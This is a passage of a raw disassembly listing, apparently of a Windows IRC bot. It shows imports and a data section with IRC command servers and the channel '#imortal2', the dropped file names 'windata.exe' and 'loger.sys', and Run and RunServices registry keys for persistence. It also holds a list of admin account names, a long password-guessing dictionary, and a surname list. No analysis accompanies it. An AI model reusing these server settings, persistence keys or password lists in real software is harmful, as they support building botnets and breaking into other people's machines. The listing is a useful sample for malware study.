dd 3AC46h, 3AC5Eh, 3AC86h, 3AC9Eh, 3ACB4h, 3ACC0h, 3ACCCh
dd 3ACE0h, 3ACEEh, 3AD04h, 3AD18h, 3AD2Ah, 3AD3Eh, 3AD4Ch
dd 3AD58h, 3AD70h, 3AD8Ah, 3AD9Ah, 3ADACh, 3ADBEh, 3ADCCh
dd 3ADDEh, 3ADF0h, 3AE08h, 3AE24h, 3AE3Eh, 3AE4Eh, 3AE68h
dd 3AE84h, 3AE90h, 3AE9Ch, 3AEAEh, 3AEC0h, 3AED4h, 3AEE4h
dd 3AEF2h, 3AF0Ch, 3AF1Eh, 3AF2Eh, 3AF3Ch, 3AF4Eh, 3AF5Eh
dd 3AF74h, 3AF82h, 3AF90h, 3AFACh, 3AFB8h, 3AFCEh, 3AFDEh
dd 3AFF2h, 3B2A2h, 3B292h, 3B282h, 3B276h, 3B260h, 3B24Eh
dd 3B23Ch, 3B228h, 3B218h, 3B1FEh, 3B1E4h, 3B1CCh, 3B1B2h
dd 3B196h, 3B186h, 3B176h, 3B166h, 3B154h, 3B136h, 3B128h
dd 3B118h, 3B106h, 3B0FAh, 3B030h, 3B03Eh, 3B058h, 3B064h
dd 3B076h, 3B088h, 3B09Ah, 3B0A8h, 3B0B6h, 3B0C4h, 3B0D4h
dd 3B0E4h, 3B0EEh, 3B2B8h, 0
dd 3B016h, 80000007h, 8000000Fh, 8000000Ch, 80000015h
dd 8000000Ah, 80000002h, 8000000Dh, 80000001h, 80000004h
dd 80000003h, 80000074h, 80000009h, 80000073h, 80000010h
dd 80000017h, 80000013h, 80000097h, 8000000Bh, 80000012h
dd 80000006h, 0
dd 784500AFh, 72507469h, 7365636Fh, 2E0073h, 736F6C43h
dd 6E614865h, 656C64h, 72430060h, 65746165h, 636F7250h
dd 41737365h, 1750000h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 347h
aSleep db 'Sleep',0
dw 248h
aLoadlibrarya db 'LoadLibraryA',0
align 2
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
dd 65470177h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65540350h
dd 6E696D72h, 54657461h, 61657268h, 7C0064h, 656C6544h
dd 69466574h, 41656Ch, 654701CBh, 6D655474h, 74615070h
dd 4168h, 6F4D0264h, 69466576h, 41656Ch, 654701D5h, 63695474h
dd 756F436Bh, 746Eh, 72430069h, 65746165h, 65726854h, 6461h
dd 704F027Ah, 72506E65h, 7365636Fh, 13B0073h
aGetcurrentproc db 'GetCurrentProcessId',0
db '=',0
aCopyfilea db 'CopyFileA',0
db 0Ch
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 156h
aGetfileattribu db 'GetFileAttributesA',0
align 4
db 83h ; ƒ
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
aZ_1 db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 2
dw 10Ch
aGetcomputernam db 'GetComputerNameA',0
align 2
dw 16Ch
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 10h
dd 654701DFh, 72655674h, 6E6F6973h, 417845h, 784500B0h
dd 68547469h, 64616572h, 2470000h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aP_1 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 21Ah
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
aZ_2 db 'z',0
aDeletecritical db 'DeleteCriticalSection',0
dw 26Bh
aMultibytetowid db 'MultiByteToWideChar',0
db 0A9h ; ©
db 2, 52h, 65h
aAdfile db 'adFile',0
align 10h
db 94h ; ”
db 3, 57h, 72h
aItefile db 'iteFile',0
db 59h ; Y
db 3, 54h, 72h
aAnsactnamedpip db 'ansactNamedPipe',0
aM_2 db 'M',0
aCreatefilea db 'CreateFileA',0
dw 387h
aWidechartomult db 'WideCharToMultiByte',0
dd 6554034Fh, 6E696D72h, 50657461h, 65636F72h, 7373h, 7544008Ch
dd 63696C70h, 48657461h, 6C646E61h, 13A0065h
aGetcurrentpr_0 db 'GetCurrentProcess',0
a__2 db '_',0
aCreatepipe db 'CreatePipe',0
align 4
db 'Å',0
aFindclose db 'FindClose',0
db '¼',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 10h
db '»',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db 'Ó',0
aFindnextfilea db 'FindNextFileA',0
db 'É',0
aFindfirstfilea db 'FindFirstFileA',0
align 4
db 0Eh
db 3, 53h, 65h
aTfilepointer db 'tFilePointer',0
align 2
dw 15Bh
aGetfilesize db 'GetFileSize',0
db 0D6h ; Ö
db 1, 47h, 65h
aTtimeformata db 'tTimeFormatA',0
align 2
dw 13Fh
aGetdateformata db 'GetDateFormatA',0
align 10h
db 0E1h ; á
db 2, 53h, 65h
aTconsolectrlha db 'tConsoleCtrlHandler',0
db 0F4h ; ô
align 2
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 4
db 81h ;
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 16Bh
aGetlocaltime db 'GetLocalTime',0
align 2
dw 297h
aQueryperform_1 db 'QueryPerformanceCounter',0
db 98h ; ˜
db 2, 51h, 75h
aEryperformance db 'eryPerformanceFrequency',0
db 0Ch
db 2, 48h, 65h
aApfree db 'apFree',0
align 10h
db 6
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 9Bh ; ›
db 1, 47h, 65h
aTprocessheap db 'tProcessHeap',0
align 2
dw 37Ch
aVirtualqueryex db 'VirtualQueryEx',0
align 10h
db 0ACh ; ¬
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
dd 654701BBh, 73795374h, 496D6574h, 6F666Eh, 724600EFh
dd 694C6565h, 72617262h, 1510079h
aGetenvironment db 'GetEnvironmentVariableW',0
db 'ê',0
aFormatmessagea db 'FormatMessageA',0
db 2 dup(0), 2
aGlobalunlock db 'GlobalUnlock',0
align 2
dw 1F9h
aGloballock db 'GlobalLock',0
align 4
dd 6E550363h, 5670616Dh, 4F776569h, 6C694666h, 25E0065h
dd 5670614Dh, 4F776569h, 6C694666h, 4E0065h
aCreatefilemapp db 'CreateFileMappingA',0
align 4
db 12h
db 3, 53h, 65h
aTfiletime db 'tFileTime',0
dw 15Dh
aGetfiletime db 'GetFileTime',0
db '²',0
aExpandenvironm db 'ExpandEnvironmentStringsA',0
db 0B3h ; ³
db 3, 6Ch, 73h
aTrcmpia db 'trcmpiA',0
db 52h ; R
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 285h
aPeeknamedpipe db 'PeekNamedPipe',0
dw 170h
aGetlogicaldr_0 db 'GetLogicalDrives',0
align 2
dw 1FAh
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 4
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
a@_1 db '@',0
aWsasocketa_0 db 'WSASocketA',0
align 4
aWs2_32_dll_0 db 'WS2_32.dll',0
align 10h
dd 65480210h, 65527061h, 6F6C6C41h, 1C00063h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
dd 745202CAh, 776E556Ch, 646E69h, 6152029Bh, 45657369h
dd 70656378h, 6E6F6974h, 1AF0000h, 53746547h, 74726174h
dd 6E497075h, 416F66h, 65470108h, 6D6F4374h, 646E616Dh
dd 656E694Ch, 20A0041h, 70616548h, 74736544h, 796F72h
dd 65480208h, 72437061h, 65746165h, 3760000h, 74726956h
dd 466C6175h, 656572h, 69560373h, 61757472h, 6C6C416Ch
dd 636Fh, 7349022Ch, 57646142h, 65746972h, 727450h, 654700F5h
dd 50434174h, 18B0000h, 4F746547h, 50434D45h, 0FC0000h
dd 43746547h, 666E4950h, 317006Fh, 48746553h, 6C646E61h
dd 756F4365h, 746Eh, 654701B1h, 64745374h, 646E6148h, 656Ch
dd 6547015Eh, 6C694674h, 70795465h, 33B0065h
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 69560379h, 61757472h, 6F72506Ch, 74636574h, 37B0000h
dd 74726956h, 516C6175h, 79726575h, 23A0000h, 614D434Ch
dd 72745370h, 41676E69h, 23B0000h, 614D434Ch, 72745370h
dd 57676E69h, 3600000h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
aA_2 db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 4Dh ; M
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
aU_1 db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
db 2Ah ; *
db 3, 53h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 'å',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
db 0B2h ; ²
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1B5h
aGetstringtypew db 'GetStringTypeW',0
align 10h
db 3Eh ; >
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 212h
aHeapsize db 'HeapSize',0
align 2
dw 229h
aIsbadreadptr db 'IsBadReadPtr',0
align 2
dw 226h
aIsbadcodeptr db 'IsBadCodePtr',0
align 2
dw 21Fh
aInterlockedexc db 'InterlockedExchange',0
dd 65530303h, 646E4574h, 6946664Fh, 656Ch, 34Eh dup(0)
seg001 ends
; Section 3. (virtual address 0003C000)
; Virtual size : 000A8000 ( 688128.)
; Section size in file : 000A8000 ( 688128.)
; Offset to raw data for section: 0003C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
seg002 segment para public 'DATA' use32
assume cs:seg002
;org 43C000h
dword_43C000 dd 0 ; DATA XREF: sub_41F146+45�o
dd offset loc_426F5A
dd offset dword_42A0C4+4
dd offset dword_42A0C4+1Bh
dword_43C010 dd 0 ; DATA XREF: sub_41F146+4C�o
dword_43C014 dd 0 ; DATA XREF: sub_41F146+12�o
dd offset aB?n ; "¡ ?N"
dd offset sub_4230FC
dd offset byte_42322F
dd offset loc_424652
dd offset dword_42555C+4Eh
dword_43C02C dd 0 ; DATA XREF: sub_41F146+17�o
dword_43C030 dd 0 ; DATA XREF: sub_41F1B0:loc_41F217�o
dd offset dword_41F8BC+0A1h
dword_43C038 dd 0 ; DATA XREF: sub_41F1B0+6C�o
dword_43C03C dd 0 ; CODE XREF: sub_41F116+23�p
; DATA XREF: sub_41F1B0:loc_41F236�o
dd offset dword_42555C+61h
dword_43C044 dd 3 dup(0) ; DATA XREF: sub_41F1B0+8B�o
dword_43C050 dd 80000002h ; DATA XREF: sub_401000+24�r
off_43C054 dd offset aSoftwareMicr_0 ; DATA XREF: sub_401000+1E�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h, 43C1A8h, 80000001h, 43C178h
dword_43C068 dd 1A0Bh ; DATA XREF: sub_40A263+48B�r
; sub_40A263+513�r
dword_43C06C dd 1A0Bh ; DATA XREF: sub_40A263+559�r
dword_43C070 dd 7E4h ; DATA XREF: sub_40274D:loc_405090�r
dword_43C074 dd 45h ; DATA XREF: sub_40274D+1E88�r
; seg000:0040B6CB�r
dword_43C078 dd 7D1h ; DATA XREF: sub_40274D:loc_4046B9�r
; seg000:loc_40BA78�r
dword_43C07C dd 201h ; DATA XREF: sub_40274D:loc_404825�r
word_43C080 dw 7C7h ; DATA XREF: sub_40274D:loc_4051A9�r
align 4
dword_43C084 dd 1 ; DATA XREF: sub_40274D+5CE�r
dword_43C088 dd 1 ; DATA XREF: sub_40A263:loc_40A58E�r
; sub_41AEDD+C�r
byte_43C08C db 2Eh ; DATA XREF: sub_40274D+9A7�r
; sub_40274D+A5B�r ...
align 10h
dword_43C090 dd 5 ; DATA XREF: sub_40A800+39�r
; sub_40A800+5F�r ...
dword_43C094 dd 4 ; DATA XREF: sub_4025EF+44�r
; sub_40274D+252�r ...
dword_43C098 dd 1 ; DATA XREF: sub_4025EF+3B�r
; sub_40274D+24C�r
aIiknc db 'iiKnc',0 ; DATA XREF: sub_40274D:loc_404EF5�o
; sub_40274D+6677�o ...
align 4
aRx db 'rx',0 ; DATA XREF: sub_40274D:loc_40539F�o
align 4
aRelax_0 db 'relax',0 ; DATA XREF: sub_40274D+79AC�o
; sub_40274D+7A63�o
align 10h
aOslo_no_eu_und db 'oslo.no.eu.undernet.org',0 ; DATA XREF: sub_40A263+477�o
; sub_40A263+504�o
aImortal2 db '#imortal2',0 ; DATA XREF: sub_40A263+492�o
; sub_40A263+51A�o
align 4
aRelax db 'relax',0 ; DATA XREF: sub_40A263+4A9�o
; sub_40A263+52C�o
align 4
byte_43C0DC db 7Ah ; DATA XREF: sub_40A263:loc_40A79F�r
; sub_40A263+54A�o
aAgreb_hr_eu_un db 'agreb.hr.eu.undernet.org',0
align 4
aImortal2_3 db '#imortal2',0 ; DATA XREF: sub_40A263+560�o
align 4
aRelax_1 db 'relax',0 ; DATA XREF: sub_40A263+572�o
align 4
aWindata_exe db 'windata.exe',0 ; DATA XREF: sub_40274D+1E75�o
; sub_40A263+13C�o ...
aLoger_sys db 'loger.sys',0 ; DATA XREF: seg000:00414B59�o
align 4
aWindata db 'windata',0 ; DATA XREF: sub_401000+B�o
unicode 0, <->,0
aWindata_exe_0 db 'windata.exe',0
asc_43C13C db '+x',0 ; DATA XREF: sub_40274D+7AE0�o
align 10h
aImortal2_0 db '#imortal2',0 ; DATA XREF: sub_40274D+1B58�o
; sub_40274D+2E40�o ...
align 4
aImortal2_2 db '#imortal2',0 ; DATA XREF: sub_40274D+41A7�o
align 4
aImortal2_1 db '#imortal2',0 ; DATA XREF: sub_40274D+3DDD�o
; sub_40274D+3F25�o
align 4
off_43C164 dd offset a@_0 ; DATA XREF: sub_40274D+7A09�r
; "*@*"
off_43C168 dd offset aMircV6_10Khale ; DATA XREF: sub_40274D+7EA�r
; "mIRC v6.10 Khaled Mardam-Bey"
dd offset aMircV6_12Khale ; "mIRC v6.12 Khaled Mardam-Bey"
dd offset aMircV6_14Khale ; "mIRC v6.14 Khaled Mardam-Bey"
dd offset aMircV6_16Khale ; "mIRC v6.16 Khaled Mardam-Bey"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: seg002:off_43C054�o
align 4
aSoftwareMicr_2 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
align 10h
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: seg000:0041CBB0�o
; seg000:0041CED2�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: seg000:0041CC5D�o
; seg000:0041CF7F�o
align 10h
off_43C220 dd offset aAdministrato_0 ; DATA XREF: seg000:00410230�r
; seg000:00410238�o
; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 10h
off_43C270 dd offset byte_42B633 ; DATA XREF: sub_410047�r sub_410047+C�o
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_1 ; "server"
dd offset aRoot ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_0 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco_0 ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dword_43C4A0 dd 10h ; DATA XREF: sub_40274D+A0B�r
; sub_40274D+A37�r ...
align 8
dword_43C4A8 dd 6C616572h ; DATA XREF: sub_40AB83+F�r
dd 2 dup(0)
dword_43C4B4 dd 0 ; DATA XREF: sub_40AB83:loc_40ABAA�r
off_43C4B8 dd offset sub_40A800 ; DATA XREF: sub_40AB83+4A�r
aConst db 'const',0
align 8
dd 1, 40A86Ch, 7474656Ch, 7265h, 0
dd 2, 40A8CAh, 706D6F63h, 2 dup(0)
dd 3, 40A917h, 6E756F63h, 797274h, 0
dd 4, 40A986h, 736Fh, 2 dup(0)
dd 5, 40A9FBh
off_43C520 dd offset aAbdulrazak ; DATA XREF: sub_40A800+20�r
; "Abdulrazak"
dd offset aAckerman ; "Ackerman"
dd offset aAdams ; "Adams"
dd offset aAddison ; "Addison"
dd offset aAdelstein ; "Adelstein"
dd offset aAdibe ; "Adibe"
dd offset aAdorno ; "Adorno"
dd offset aAhlers ; "Ahlers"
dd offset aAlavi ; "Alavi"
dd offset aAlcorn ; "Alcorn"
dd offset aAlda ; "Alda"
dd offset aAleks ; "Aleks"
dd offset aAllison ; "Allison"
dd offset aAlongi ; "Alongi"
dd offset aAltavilla ; "Altavilla"
dd offset aAltenberger ; "Altenberger"
dd offset aAltenhofen ; "Altenhofen"
dd offset aAmaral ; "Amaral"
dd offset aAmatangelo ; "Amatangelo"
dd offset aAmeer ; "Ameer"
dd offset aAmsden ; "Amsden"
dd offset aAnand ; "Anand"
dd offset aAndel ; "Andel"
dd offset aAndo ; "Ando"
dd offset aAndrelus ; "Andrelus"
dd offset aAndron ; "Andron"
dd offset aAnfinrud ; "Anfinrud"
dd offset aAnsley ; "Ansley"
dd offset aAnthony ; "Anthony"
dd offset aAntos ; "Antos"
dd offset aArbia ; "Arbia"
dd offset aArduini ; "Arduini"
dd offset aArellano ; "Arellano"
dd offset aAristotle ; "Aristotle"
dd offset aArjas ; "Arjas"
dd offset aArky ; "Arky"
dd offset aAtkins ; "Atkins"
dd offset aAugustus ; "Augustus"
dd offset aAurelius ; "Aurelius"
dd offset aAxelrod ; "Axelrod"
dd offset aAxworthy ; "Axworthy"
dd offset aAyiemba ; "Ayiemba"
dd offset aAykroyd ; "Aykroyd"
dd offset aAyling ; "Ayling"
dd offset aAzima ; "Azima"
dd offset aBachmuth ; "Bachmuth"
dd offset aBackus ; "Backus"
dd offset aBady ; "Bady"
dd offset aBaglivo ; "Baglivo"
dd offset aBagnold ; "Bagnold"
dd offset aBailar ; "Bailar"
dd offset aBakanowsky ; "Bakanowsky"
dd offset aBaleja ; "Baleja"
dd offset aBallatori ; "Ballatori"
dd offset aBallew ; "Ballew"
dd offset aBaltz ; "Baltz"
dd offset aBanta ; "Banta"
dd offset aBarabesi ; "Barabesi"
dd offset aBarajas ; "Barajas"
dd offset aBaranczak ; "Baranczak"
dd offset aBaranowska ; "Baranowska"
dd offset aBarberi ; "Barberi"
dd offset aBarbetti ; "Barbetti"
dd offset aBarneson ; "Barneson"
dd offset aBarnett ; "Barnett"
dd offset aBarriola ; "Barriola"
dd offset aBarry ; "Barry"
dd offset aBartholomew ; "Bartholomew"
dd offset aBartolome ; "Bartolome"
dd offset aBartoo ; "Bartoo"
dd offset aBasavappa ; "Basavappa"
dd offset aBashevis ; "Bashevis"
dd offset aBatchelder ; "Batchelder"
dd offset aBaumiller ; "Baumiller"
dd offset aBayles ; "Bayles"
dd offset aBayo ; "Bayo"
dd offset aBeacon ; "Beacon"
dd offset aBeal ; "Beal"
dd offset aBean ; "Bean"
dd offset aBeckman ; "Beckman"
dd offset aBeder ; "Beder"
dd offset aBedford ; "Bedford"
dd offset aBehenna ; "Behenna"
dd offset aBelanger ; "Belanger"
dd offset aBelaoussof ; "Belaoussof"
dd offset aBelfer ; "Belfer"
dd offset aBelinCollart ; "Belin-Collart"
dd offset aBellavance ; "Bellavance"
dd offset aBellhouse ; "Bellhouse"
dd offset aBellini ; "Bellini"
dd offset aBelloc ; "Belloc"
dd offset aBenedictDye ; "Benedict-Dye"
dd offset aBergson ; "Bergson"
dd offset aBerkeJenkins ; "Berke-Jenkins"
dd offset aBernardo ; "Bernardo"
dd offset aBernassola ; "Bernassola"
dd offset aBernston ; "Bernston"
dd offset aBerrizbeitia ; "Berrizbeitia"
dd offset aBetti ; "Betti"
dd offset aBeynart ; "Beynart"
dd offset aBiagioli ; "Biagioli"
dd offset aBickel ; "Bickel"
dd offset aBinion ; "Binion"
dd offset aBir ; "Bir"
dd offset aBisema ; "Bisema"
dd offset aBisho ; "Bisho"
dd offset aBlackbourn ; "Blackbourn"
dd offset aBlackwell ; "Blackwell"
dd offset aBlagg ; "Blagg"
dd offset aBlakemore ; "Blakemore"
dd offset aBlanke ; "Blanke"
dd offset aBliss ; "Bliss"
dd offset aBlizard ; "Blizard"
dd offset aBloch ; "Bloch"
dd offset aBloembergen ; "Bloembergen"
dd offset aBloemhof ; "Bloemhof"
dd offset aBloxham ; "Bloxham"
dd offset aBlyth ; "Blyth"
dd offset aBolger ; "Bolger"
dd offset aBolick ; "Bolick"
dd offset aBollinger ; "Bollinger"
dd offset aBologna ; "Bologna"
dd offset aBoner ; "Boner"
dd offset aBonham ; "Bonham"
dd offset aBoniface ; "Boniface"
dd offset aBontempo ; "Bontempo"
dd offset aBook ; "Book"
dd offset aBookbinder ; "Bookbinder"
dd offset aBoone ; "Boone"
dd offset aBoorstin ; "Boorstin"
dd offset aBorack ; "Borack"
dd offset aBorden ; "Borden"
dd offset aBossi ; "Bossi"
dd offset aBothman ; "Bothman"
dd offset aBotosh ; "Botosh"
dd offset aBoudin ; "Boudin"
dd offset aBoudrot ; "Boudrot"
dd offset aBourneuf ; "Bourneuf"
dd offset aBowers ; "Bowers"
dd offset aBoxer ; "Boxer"
dd offset aBoyajian ; "Boyajian"
dd offset aBoyes ; "Boyes"
dd offset aBoyland ; "Boyland"
dd offset aBoym ; "Boym"
dd offset aBoyne ; "Boyne"
dd offset aBracalente ; "Bracalente"
dd offset aBradac ; "Bradac"
dd offset aBradach ; "Bradach"
dd offset aBrecht ; "Brecht"
dd offset aBreed ; "Breed"
dd offset aBrenan ; "Brenan"
dd offset aBrennan ; "Brennan"
dd offset aBrewer ; "Brewer"
dd offset aBrewer ; "Brewer"
dd offset aBridgeman ; "Bridgeman"
dd offset aBridges ; "Bridges"
dd offset aBrinton ; "Brinton"
dd offset aBritz ; "Britz"
dd offset aBroca ; "Broca"
dd offset aBrook ; "Brook"
dd offset aBrzycki ; "Brzycki"
dd offset aBuchan ; "Buchan"
dd offset aBudding ; "Budding"
dd offset aBullard ; "Bullard"
dd offset aBunton ; "Bunton"
dd offset aBurden ; "Burden"
dd offset aBurdzy ; "Burdzy"
dd offset aBurke ; "Burke"
dd offset aBurridge ; "Burridge"
dd offset aBusetta ; "Busetta"
dd offset aByatt ; "Byatt"
dd offset aByerly ; "Byerly"
dd offset aByrd ; "Byrd"
dd offset aCage ; "Cage"
dd offset aCalnan ; "Calnan"
dd offset aCammelli ; "Cammelli"
dd offset aCammilleri ; "Cammilleri"
dd offset aCanley ; "Canley"
dd offset aCapanni ; "Capanni"
dd offset aCaperton ; "Caperton"
dd offset aCapocaccia ; "Capocaccia"
dd offset aCapodilupo ; "Capodilupo"
dd offset aCappuccio ; "Cappuccio"
dd offset aCapursi ; "Capursi"
dd offset aCaratozzolo ; "Caratozzolo"
dd offset aCarayannopoulo ; "Carayannopoulos"
dd offset aCarlin ; "Carlin"
dd offset aCarlos ; "Carlos"
dd offset aCarlyle ; "Carlyle"
dd offset aCarmichael ; "Carmichael"
dd offset aCaroti ; "Caroti"
dd offset aCarper ; "Carper"
dd offset aCartmill ; "Cartmill"
dd offset aCascio ; "Cascio"
dd offset aCase ; "Case"
dd offset aCaspar ; "Caspar"
dd offset aCastelda ; "Castelda"
dd offset aCavanagh ; "Cavanagh"
dd offset aCavell ; "Cavell"
dd offset aCeniceros ; "Ceniceros"
dd offset aCerioli ; "Cerioli"
dd offset aChapman ; "Chapman"
dd offset aCharles ; "Charles"
dd offset aCheang ; "Cheang"
dd offset aCherry ; "Cherry"
dd offset aChervinsky ; "Chervinsky"
dd offset aChiassino ; "Chiassino"
dd offset aChien ; "Chien"
dd offset aChildress ; "Childress"
dd offset aChilds ; "Childs"
dd offset aChinipardaz ; "Chinipardaz"
dd offset aChinman ; "Chinman"
dd offset aChristenson ; "Christenson"
dd offset aChristian ; "Christian"
dd offset aChristiano ; "Christiano"
dd offset aChristie ; "Christie"
dd offset aChristopher ; "Christopher"
dd offset aChu ; "Chu"
dd offset aChupasko ; "Chupasko"
dd offset aChurch ; "Church"
dd offset aCiampaglia ; "Ciampaglia"
dd offset aCicero ; "Cicero"
dd offset aCifarelli ; "Cifarelli"
dd offset aClaffey ; "Claffey"
dd offset aClancy ; "Clancy"
dd offset aClark ; "Clark"
dd offset aClement ; "Clement"
dd offset aClifton ; "Clifton"
dd offset aClow ; "Clow"
dd offset aCoblenz ; "Coblenz"
dd offset aCoito ; "Coito"
dd offset aColdren ; "Coldren"
dd offset aColella ; "Colella"
dd offset aCollard ; "Collard"
dd offset aCollis ; "Collis"
dd offset aCompton ; "Compton"
dd offset aCompton ; "Compton"
dd offset aComstock ; "Comstock"
dd offset aConcino ; "Concino"
dd offset aCondodina ; "Condodina"
dd offset aConnors ; "Connors"
dd offset aCorey ; "Corey"
dd offset aCornish ; "Cornish"
dd offset aCosmides ; "Cosmides"
dd offset aCounter ; "Counter"
dd offset aCoutaux ; "Coutaux"
dd offset aCrawford ; "Crawford"
dd offset aCrocker ; "Crocker"
dd offset aCroshaw ; "Croshaw"
dd offset aCroxen ; "Croxen"
dd offset aCroxton ; "Croxton"
dd offset aCui ; "Cui"
dd offset aCurrier ; "Currier"
